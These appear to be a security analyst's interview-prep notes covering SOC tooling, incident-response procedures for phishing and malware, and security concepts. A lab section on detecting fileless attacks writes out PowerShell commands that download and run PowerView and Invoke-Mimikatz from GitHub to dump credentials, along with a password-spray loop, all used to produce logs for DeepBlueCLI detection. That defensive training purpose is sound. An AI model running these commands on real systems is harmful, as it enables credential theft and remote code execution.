EY
EY
EY
Arun - Dawn - The first appearance of light in the sky before sunrise
Ernst & Young is a multinational professional services network with headquarters in
London, England
It's purpose is Building a better working world
Very Good Culture & People
Outstanding Company
Work Life Balance
EY really provide quality services
EY is dedicated to help organizations solve their toughest challenges
EY PWC P&G Deloitte
Splunk SIEM, Microsoft Azure Sentinel SIEM, Securonix NG SIEM, ArcSight SIEM
Splunk Ticketing, Service Now, BMC ServiceDesk, Remedy Ticketing System
Carbon Black, Falcon Insight, Sophos Intercept
Symantec ESG AM DLP
Interviewer: Paulo Nicolas and our San Diego InfoSec Team - 90k to 100k
Dexcom Taguig 4.8 Overall 4.0
Outstanding Company
Good Culture & People
Work Life Balance
American Healthcare (Specializing in Medical Devices) Company.
Dexcom was founded 1999
Dexcom empowers people to take control of diabetes through innovative continuous
glucose monitoring (CGM) systems.
Headquartered in San Diego, California
Dexcom empowers people to take control of diabetes and has emerged as a leader of
diabetes care technology.
This company really care to people. They listening to the needs of users,
caregivers, and providers.
Dexcom simplifies and improves diabetes management around the world.
Yes, No problem, First of all, Thank you very much for inviting me to be
interviewed for this position.
My name is Christan George, You can call me George for short. I'm 27 years old. I
have 3 siblings and I am the eldest.
I am applying for this Job, because I think the skills, the qualities, and the
experience that I have are strong match for the job description.
Over the years, I build a lot of skills and qualities that I believe will be a
benefit to your organization.
I'm a very strong team worker, I am very focused on achieving difficult tasks and I
am the type of person that will work hard, and I will never let you down.
I feel that if I will be a successful candidate for this position, you will quickly
see a positive return on your investment.
I have a total of 8 years of experience in the IT Industry, in which my first 3
years were focused on the Network Engineering side of things and the last 5 years
in Information Security.
I started my career as an OJT in Rivan School of Technology and was absorbed by the
company.
Rivan is a Local Company here in the Philippines, its a 3 way Company.
Testing Center, Training Center and Consulting Company that has a branch in Manila
and Makati.
Basically, it's a Solution Company related to Network, System and Security.
Rivan deployed me in Multiple Companies as a NOC Analyst on a non disclosure
contractual arrangements.
DPM - This sensor has a Suricata installed, It's running to capture network traffic
and creates alerts predicated over 45,000+ rules in the field.
BCM - This sensor is the one that's taking the packet header information from the
network traffic mirrored from the customer, after collecting for one hour, it will
process the data using several processes to create an alert.
FSM - This sensor is our security event correlation module that ingests, parses,
and generate alerts from common log sources provided by the customer like Sysmon,
Windows System and Security, Firewalls, Proxy, Netflow, DNS, PCAP, DHCP etc.
VSM - This sensor is deployed as an integrated scanner to the client. Previously
we are using Nessus, but there's a problem with pricing or licensing so we change
to SAINT Security Suite for the scanning software. It can also perform data and
security scans based on the critical assets provided by the client.
Lastly the MCU- this is where we set up an encrypted channel to communicate with
our boxes, we are accessing the web based console remotely, the alert and traffic
data are presented through the front end GUI that we call WebApp.
• I'm doing some tuning of false positive and normal alerts so we can provide more
efficient and effective monitoring.
For example, an authorized scan per customer's feedback. They are like Qualys,
Tenable and Rapid7. We need to tune this out for a specific period of time to
reduce the noise.
CVE - Common Vulnerabilities and Exposures - is a list of publicly disclosed
computer security flaws.
Another example is a CVE's that was sent out to the customer, but they confirmed it
is unused or nonexistent in their environment. Its a FP, we need to tune this out
to stop the noise and check on our detection strategies on what are the logic that
trigger the alert. We can tweak the rules, so we don't receive that kind of FP
alert again and we can focus into more worth it alerts.
• I'm also Auditing IR emails to ensure my Associates are following IR SOP based on
our Playbook.
One example of that is correct categorization of the ticket. Every incident should
be properly categorized so the customer will not be confused when they start
investigating. This is very critical because we are using auto generated templates
for prevention and remediation, and its unique in every category. Imagine if you
receive a phishing alert and sent it out with a malware category, automatically one
of our recommendations there is to block the offending IP and domain, which is not
the best practice on handling a phishing alert all the time.
What if this is a legit hosting IP and the adversary is actually abusing it. Let's
say Digital Ocean. I'm going to create a domain and I'm going to point it to the
legit hosting IP and I will send a phishing campaign to your company. What will you
do? Remember, if you block the IP, there are legit website using this IP so what we
suggest is to block the domain for now. Send some follow up to confirm to the
customer if they have any business with them.
• Sometimes we are also creating or modifying FSM alerts based on the forwarded
logs using Regex. Common log sources provided by the customer are: Sysmon, Windows
System and Security, Firewalls, Proxy, Netflow, DNS, PCAP, DHCP etc. We are using
default parsers and rules that are maintained by Masergy to make this alert, but
sometimes we also tailor those alerts if the client wants to be alerted or not to
be alerted on specific parameters such as event codes, logon types, account names
and admin groups or users.
We are gathering data via pull or push
Pull - We offer selected integrations that will pull information from the rest of
API like Cabon Black.
Push - The customer can always forward data in syslog format to our box.
You can forward us the logs via syslog format over UDP port 514. Log data is stored
on the device for 365 days
• I'm also involved in facilitating trainings for the new members of the Manila SOC
Team.
For example, explaining how they can use some open source tools like URLScan,
Virustotal, IPVoid, RiskIQ, IPDatabase, Intezer, Whois. If you have IOC's like IP
addresses, Hashes and Domains, can you check if it's malicious or not? Can you
check if this website is hosting ransomware or malicious java script? Can you give
me some metadata? Can you check if there are different anti virus vendor that would
flag this as a malicious?
Cyber Chef, a cyber swiss army knife of security professionals. Let's say I have
Base64 strings, there's a point in time, you will analyze an encoded command that
you need to decode, so this is were you can use this Cyber Chef kind of thing. You
just need to choose proper recipe, bake it and it will automatically give you an
output.
What else? CFF Explorer, CAPA, PE Studio, Sysinternals Suite for static malware
analysis, extract some metadata (like file type, file size, when it was created and
modified, the hashes) what are the capabilities of this binary (maybe it can write
files, create and terminate some process), important headers, strings, DLL related
to this.
Some public malware sandbox like Hybrid Analysis, Any.Run, Cuckoo and Joe Sandbox
you can just drop the file or IOC's and it will automatically give you a report.
Let's say I need to know if this is malicious or not and I don't want to run this
on my production laptop, so I will run this on a public malware sandbox. I will
drop a certain file like a pdf and suddenly it gives me information like if a user
click this document what would happen in the background? It would run a cmd or
powershell it would run couple of commands which is very malicious because It's
connecting to some C2 IP and shortened links, aside from that you we can also see a
process graph or what we call process tree like on the carbon black or sentinel one
and some mapping to Mitre ATT&CK framework.
Just a caveat here, due to OPSEC (Operational Security), we don't just upload
sample files coming from our internal network, because it might contain sensitive
information against our organization like maybe recipes, projectX, salary details
of our employees. What we can do is get the hash value of the file and check it on
VT, HA, Intezer and everything.
• We are also, assisting with the Development of Processes and Procedures for
Overall SOC Functions. Since its pandemic, the latest is we did some on call
procedure and policy because right now our setup is WFH and sometimes we cannot
assure that internet connection is stable and there is no power outage or
interruption that would happen, like lately we have an earthquake and typhoons
here, so we outline a document that is aiming to lessen the risk of our manpower
being below the threshold.
Kaseya is a software company that provides service into different MSSP, they got
breached and they call it supply chain attack, it's like the same attack last year
December that happens in solarwinds, it was breached because of supply chain attack
wherein during the updates of the configuration or the platform itself, there's
this backdoor like a DLL that was delivered to all of their clients. But in Kaseya
its ransomware, there platform has been infected by ransomware.
Backdoor is like, it negates normal authentication procedures to access a system.
Remote access is granted to the adversary and it can remotely issue some system
commands and update the malware or the payload itself.
Ransomware is a malware that encrypts the victim's files, the adversary demands a
ransom to restore access to the data via a decryption key upon payment.
Terminal Server Aware means that this binary is capable of running remote desktop
services, even the interactive logon connection was lost this binary can survive
using remote desktop services.
Epoch value can be modified by the malware author during weaponization phase using
low level languages and their purpose is to confuse the forensicators. Lets say
okay this is like a new malware or no this is an old malware the goal is for the
blue teamers to have a hard time distinguishing some informations that they need.
There's some timestomping activity that was done by APT's aside from clearing the
whole logs they can also modify time attributes to hide changes to existing logs.
Let's say I'm going to attack your organization during weekends, but I don't what
you to see my activities so I will manipulate the timestomp and blend it on
weekdays during normal working hours.
IDS (Intrusion Detection System) - It will give you an alert, but it doesn't have a
capability to block it.
IPS (Intrusion Prevention System) - If it triggers the detection strategy that this
is malicious it can block it.
It monitors network and host traffic from inbound and outbound for indicators of an
attack.
Cisco, McAfee, Trend Micro, Dark Trace, Suricata
Security Onion is a VM with packages wherein it has Bro Zeek, Suricata, Snort all
of these open source tools gather in 1 VM.
ESG (Email Security Gateway) is a defense against malicious email, spam, spear
phishing, whaling, ransomware and even zero day attacks.
If you heard reports this 2021 from verizon data breach investigation report, red
canary threat detection report, the threat landscape report, vade secure report
still phishing is the dominant or heavily used by the adversaries as initial access
of their attack. So if you don't have any security appliance for protecting our
email gateway then we are very vulnerable even to simple phishing attack. ESG can
do some filtering of a common signatures specially those file format that was
converted from .exe to .pdf, it can block it because of some deep header analysis
feature I think.
Proofpoint, Mimecast, Forcepoint, Sophos, Microsoft365E5
Let's say we have Microsoft365E5 and on top of that we are also using Proofpoint
"Advanced Email Security" as an additional layer of security to filter most of the
phishing and spam emails on the perimeter level. For example we have 1M alerts
related to email, then Proofpoint will drill it down to 200K alerts using deep
header analysis feature of it, so there is an efficiency. Then the 200K alerts will
also be filtered using the capability of Microsoft365E5, by checking if they are
properly aligned to a configuration like SPF and DKIM is passed, allowed that email
to be receive, but if SPF passes and DKIM fail, I want you to drop or reject or put
that email to spam.
Okay, there's a phishing alert on the SIEM. First, I will check the rebuild. It's
the content or log snippet that triggers the alert, maybe there are sensitive
information like username, email and password. I will also, check the reputation of
the IP address on VT, IPVoid, Intezer, Talos, X-Force, Etc. The domain that was
accessed will be visually inspected in URLScan or CheckPhish. We will also check
all available logs to see if there are other users involve in this alert. Then if
its TP based on the analysis like exposed credentials, IP and domain is tag as
phishing, we will permanently block it and send an email with a follow up call to
the client. We will tell them that we detected a traffic wherein one of their user
accessed a phishing site and credentials were exposed. It would be advisable for
the user to change credentials to avoid being compromised and use MFA as an
additional security. They also need to delete anything related to the email across
their environment and the user should take a security awareness training.
In some internal cases, the scenario is like HR staff notice that they receive an
email with a link and attachment that they are not expecting, what they will do is
create a ticket in JIRA, attached the suspicious email then forward it to us and we
will begin the investigation.
1st as part of Preparation, I will open all the tools that I'm using when dealing
with this kind of ticket. VT, IPVoid, RiskIQ, Intezer, URLScan, CheckPhish,
URLVoid, MXToolBox, AzureHeaderAnaLyzer, PhishTank.
After that I will proceed with Detection and Analysis, I will personally check it
on what I think about the email, is it Spam? Reconnaissance? Impersonation? I can
also ask the user if they click the link or download some files, next is to extract
full email header information, make sure to check the important fields like
From - is the email address matches the display name?
Reply-to - does it match the source or sender? Because if not, there's a very good
chance that its forged
Return-Path - does it match where the message originated? "From"
Subject - high level topic of the message
Source and Destination IP
Received-SPF - Mail source from verified source - Can see source IP
Authentication-Results - is SPF and DKIM pass?
DKIM-Signature - it contains information about the sender, message, the public key
that is required for verification
Message-ID - it's like a tracking information or number
We will also check all the logs for additional information like if the traffic was
automatically blocked? How many attempts were triggered for that specific time
frame? Do we have other related users involve in this alert?
Check the reputation of the link, how it looks like? Any hit for phishing?
Put the attachement on a malware sandbox and wait for the report to be finish. "You
can DL the binary for future reference"
Upon further investigation I concluded that this is a kind of impersonation because
the sender is [email protected] which is not the naming convention that we
are using in the organization, it should be Wow.PH.com
Containment phase, we should block the IP address, the domain, the hashes related
to this ticket and for Eradication, we can request for purging the email becuase it
has attachment that we can investigate further and the deletion of anything related
to this email across our environment.
Let's say that the phishing attempt by the adversary is successful, the HR
downloaded the attachment and run the executable disguising as a pdf file like its
a resume of an applicant.
It was detected by the SIEM, I will click the ticket and I will be redirected to
our EDR and after that it will display everthing that I need for the investigate.
It will display some information like: File Name, File Type, File Path, Hashes, IP
addresses, Original Process and some Command Line Arguments, there's a lot.
Since I have this information and my tools is already prepared, I will start with
the analysis phase, I will correlate or fetch the host and network logs or all the
logs based on the IP address and hashes, maybe there's some connection going
outside of our network that is happening.
I will also check the reputations on VT, Talos, X-Force, I will check the file
path, maybe there was something that has been dropped on the %Temp, %AppData or
%Public folder, by doing that I can already tell if this is related to some
ransomware campaign.
If this is TP, we have an Incident. I need to act fast, I need to stop the
bleeding, I will start the containment since I'm the 1st responder.
I will do the actions like, I will connect to this patient zero, move it to our
isolated platform or another site using the EDR, disconnect it from the network,
internet and everything. Its just me and this machine.
After that, permanently block the IP addresses, check the dashboards maybe there's
some russian, north korean or ukraine IP addresses that is connecting to our
system, the domains, the hashes, those uncommon ports that is present on the logs.
Blocked it.
Next is the eradication phase, Its the full removal of the remnants or the
artifacts of attacker in our environment.
Since we saw some binary that was dropped on the %Temp, %AppData or %Public folder
its about time to remove it.
We can also check for persistence, like some created schedule task or modified
binary on the run keys and startup folder.
It's also time to patch the system, maybe there is a vulnerability, kill some
processes. We can also initiate anti malware and IOC scan on the whole system for
eradication.
For the recovery procedure, some sort of making sure that all the applications on
the system unit are running and updated before putting it back to the production,
make some verified back up as well and for post incident activity which is very
important, we can put on the report about how did it bypass our security controls
on the perimeter level maybe some configuration problem with our ESG something like
that, how can we detect this kind of initial access that an email with an
attachment is compressed and password protected. Conduct a security awareness
training that if you are not expecting an email and it's not from our organization,
you should report it to the IT team.
We have an alert in our SIEM. We detected a file on this machine that is connecting
to an external IP address. What will you do?
Okay, For this scenario I will expect that preparation and detection phase is done
already. I will focus on the analysis until the last phase. First, I will check the
rebuild, what is the detection strategy that triggers the alert, maybe this is
related to some process creation like notepad.exe is spawning some cmd or
powershell and its connecting to some offending IP, I can see it there what is the
arguments that was used. After that I will check the IP notes, Sensor notes and
Alert notes, maybe this is a normal behavior on the clients environment, like they
are testing something, aside from that I will check the reputation of the IP
address involved, the hashes and some domains upon generating all the available
logs to see who is the internal machine from that time frame. If no related notes
to this and it has a malicious reputation based on the tools that was used, I will
block it as part of containment phase, put the hashes in EDR, IP address and domain
on the firewall and request for permanent block after confirm from the customer
side that they don't have any business with them. For, eradication phase I will
delete the files involved, Kill the process, Patch the system. We can also initiate
anti malware and IOC scan on the whole system for eradication.
For the recovery procedure, some sort of making sure that all the applications on
the system unit are running and updated, make some verified backup as well and for
post incident activity which is very important, we can put on the report about how
did it bypass our security controls on the perimeter level, maybe some
configuration problem something like that. Conduct a security awareness training
that if you are not expecting an email and it's not from our organization, you
should report it to the IT team.
Fileless malware is a type of malicious software that uses legitimate programs like
cmd or powershell to blend into the normal traffic to be more stealthy. It's a kind
of attack that is running in memory, It's not touching the disk and more
sophisticated, anti malware defenses even with updated signatures can't easily
detect it. Example of this is like the adversary is tricking the user to click the
link, download the file, then when executed, it will use a cmd in the background,
launch powershell that is connecting to, lets say some repository in github like
getting powershell empire and it will automatically run its intention. Empire is
pure PowerShell post-exploitation framework. It quickly deploys a lot of post-
exploitation modules ranging from key loggers to Mimikatz, and adaptable
communications to evade network detection, all wrapped up in one framework. We can
use DeepBlueCLI, a PowerShell Module for Threat Hunting via Windows Event Logs and
other framework to investigate this.
Incident Response: Detecting Host Fileless Attacks
PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day2\DeepBlueCLI-master"
.\DeepBlue.ps1 .\evtx\password-spray.evtx 4648 Password Spray Attack -
1102 Audit Logs Was Cleared
.\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx 4688 A new
process has been created
powershell.exe -exec Bypass -noexit -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/
PowerTools/master/PowerView/powerview.ps1')"
powershell.exe -exec bypass -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/
Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz
-DumpCreds"
.\DeepBlue.ps1 -log PowerShell
.\DeepBlue.ps1 -log PowerShell | Out-GridView
PowerShell (Run as Admin)
Foreach ($num in 1..100){echo bad | runas /user:guidem$num cmd.exe}
.\DeepBlue.ps1 -log Security
.\DeepBlue.ps1 -log Security | Out-GridView
Actually, I read something related to that online that if you are a CISO of an
organization and doing some security awareness you should be more sensitive as
well, because there's this CISO that generated a security awareness during covid
time where people is desperate with money and bonus.
This CISO creates a bogus phishing email for security awareness to that
organization telling that you have this amount of bonus and It will be given next
month because the company is doing a good as a team, we hit our targets, so please
click this link in order to confirm your identity, something like that.
This CISO got roasted on twitter because of being insensitive at times like this,
a lot of comments like this not how you perform a security awareness program, it's
not the time to trick user in terms of salary bonuses or whatever.
The suggestion here is be sensitive when creating a security awareness program,
everyone has a breakdown right now because of covid, not everyone has the capacity
or capability to survive within the next few weeks or months, people is so
desperate right now, so just be careful on that.
If I can remember it clearly, we used this DLP logs on some insider threat
incident, our client suspected that one of their privilege employee that rendered
for 15 days notice is always taking over time and maybe he is trying to access or
exfiltrate some data, so what we did their is extract multiple logs, including DLP
logs, Windows logs, USB logs, Logon logs based on the time frame that they give,
after that we investigate it, correlate it, we tie it together using the event ID's
and we found out that this user was logged in at that time, trying to access this
folder and exfiltrate the data using flash drive then they close the ticket, they
will be the one who will handle the incident from that point. Thank you for the
assistance.
5145: A network share object was checked to see whether client can be granted
desired access
4656: A handle to an object was requested
4663: An attempt was made to access an object
4658: The handle to an object was closed
wmic diskdrive get interfacetype,mediatype,model
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
Let's say I receive an alert on the event notifier of our SIEM regarding OpenVAS,
SQL Injection, Password File or NMAP, anything related to inbound vulnerability
scan. I will click the event and it will auto redirect me on the monitoring
console. I will do a quick filter on the offending IP to make sure if these alerts
also appears on the other sensors, after that I will check the rebuild on what is
the detection strategy that trigger the alert. I will also generate the logs from
this IP to check if it was blocked by the other security controls that is deployed
in the environment. I will check if there are any alert notes, sensor notes or IP
notes for this, if no notes I will automatically block it because its an offending
IP that is not confirmed in the environment. I will start to create an IR email,
put all the analysis that I did, like based on the logs, the traffic was not
automatically blocked, the IP address involve has a malicious reputation. It's
scanning the network to gain information that could help them compromising your
system. Also, I will tell them that I already permanently blocked the offending IP.
IEC 62443
ICS/SCADA
Industrial control systems (ICS) are often managed via a Supervisory Control and
Data Acquisition (SCADA) systems that provides a GUI for operators to easily
observe the status of a system, receive any alarms indicating out-of-band
operation, or to enter system adjustments to manage the processes.
pyramid of pain it was created by David Bianco a famous guy and sans instructor
this framework is created to give a highlight of what are the different artifacts
and what is the impact to the adversaries if we detected this from defensive
approach
the pyramid of pain is consists of 6 different levels, from the bottom its
hash values - trivial
ip address - easy
domain names - simple
network/host artifacts- annoying
tools - challenging
ttps - tough!
lets say im the attacker and the defenders are able to detect the hash value of the
file that im using, that's gonna be trivial to me. i can easily change a single
character on my code, save it, compile it an then i will have a new hash value, in
just a snap i can easily change the hash value of it.
and then you find my ip address, as a defender you wil block it and for me that's
easy. i dont care because i can easily spin up some cloud instance and it will give
me new public ip address and then i can intercept to your network again.
how about domain name? sometimes adversaries don't really care about domain names,
they can simply register some weird domain name with a tld of .win .vip. tk .kim
for free and they can use it as a c2 channel. that's very simple for them.
how about network/host artifacts? lets say as a good defender, you have a detection
strategy that for every executable file that is drop on the %Temp folder give me an
alert. that's gonna be annoying to me because for almost all of my attack
methodology i'm used to it.
and if you also have a good detection strategy for the tools like mimikatz for
credential dumping or cobalt strike if there's a pipe on the event and network logs
ow that's gonna be challenging to me.
and know the top of the pyramid the ttps. its already 2021 and you know, we are not
just focusing or detecting external attacks like port scanning and other related
attempts to our external network, we are also focusing now on the behavioral kind
of things. its not just about hashes, ip addresses, domain names and other ioc's,
but we are also detecting based on the behavior of a certain attack. for example
phishing. common behavior of this technique is sending email and when the target
receive it, there will be a certain link or attachement that has excel that ask the
user to enable the macros and once its enabled it will spawn cmd or powershell on
the background. the behavior, the logic behind this technique is the parent and
child relationship where in the file is spawning cmd or powershell, thats the
ttps, there are 14 tactics, 185 techniques and i think 367 sub techniques you know
there's a lot to digest there.
Recovery Procedure
some sort of rebuilding the server or maybe rebulding the image of the infected
machine using verified back up we can restore all the activities softwares the
thing that i can see in the soc stand point is that they always put the server into
the production without asking the business owner so for example you contained a
specific server and then theres no approval from the business owner like you have
to ask them if ever the applications are running maybe they are running sap system
maybe they are running some erp system and suddenly you rebuild this server and
then if they are not working on their end and once you put it back to production
then we are addressing some lost of confidence to our security team my suggestion
create a template where in you can ask the business owner before you put back the
server into the production test the system if all the application is really working
before we can close the ticket before we can say okay we are done with the recovery
stage
1. What are the tools that you can use to get static information of a certain PE?
CFF Explorer, PE Studio, CAPA, Sysinternal Suites.
2. How would you analyze packet capture? Do you use any tools for such?
Wireshark, Bruteshark, Tshark, TCPDump, Network Miner, Moloch or Arkime.
1. In windows system, what is the location or directory where event logs are
stored?
The typical location if we are running windows vista up and above like windows 8
windows 10 and windows 11, those are being stored in C:\Windows\System32\winevt
folder that's the location of where event logs are being stored by the operating
system. Now, lets say you are running windows XP, where is the location? That would
be C:\Windows\System32\config folder and then you can see there the event logs
along with registry hives.
2. Phase in Cyber Kill Chain where the adversary performs enumerating employees,
services, etc.?
Reconnaissance,
3. Stage of Incident Response where fully clean up and removing the cause of the
incident occurs?
Eradication,
4. During the incident, immediately shut down the infected system and disconnect it
from the network? True or False?
False, if we shut down our machine its a very minimal chance that we can recover
the volatile data. We should get the memory dump first so we can investigate it
properly.
6. This is the type of analysis that focuses on the least frequent occurrence. It
allows analysis of large amount of data without drowning. Long Tail Analysis
7. How do you stay up-to-date with the latest infosec development related to IR?
Twitter, Twitter Deck it contains a lot of feeds related to Vulnerability
Assessment, Threat Intelligence, Malware Analysis, Digital Forensics, Cyber
Defense, Threat Hunting, Penetration Testing a lot. DFIR Report, Krebs On Security,
Hacker News, SANS.edu
Hi Sir Joelle,
As I compose this email, every strike on keys feels like a stab in my heart.
This is one of the toughest and saddening decisions I ever had to make.
I am resigning from my post as a Tier 3 Network Security Analyst of the most
hardworking team I ever had the opportunity of being a part of... the MSOC.
It is nothing more than a career move. Everything else here in Masergy is superb.
I couldn't have asked for a more supportive and/or trusting superiors such as
yourself.
We couldn't have picked the perfect mix of individuals here in MSOC. The synergy
amongst all of them is always visible.
Sometimes Pass (1.00) Most of the Time Fail (0.00) - Cutting Classes, Coin
Flipping, Billiards, Dota, Mixed Martial Arts, Food Trip, Social Drinking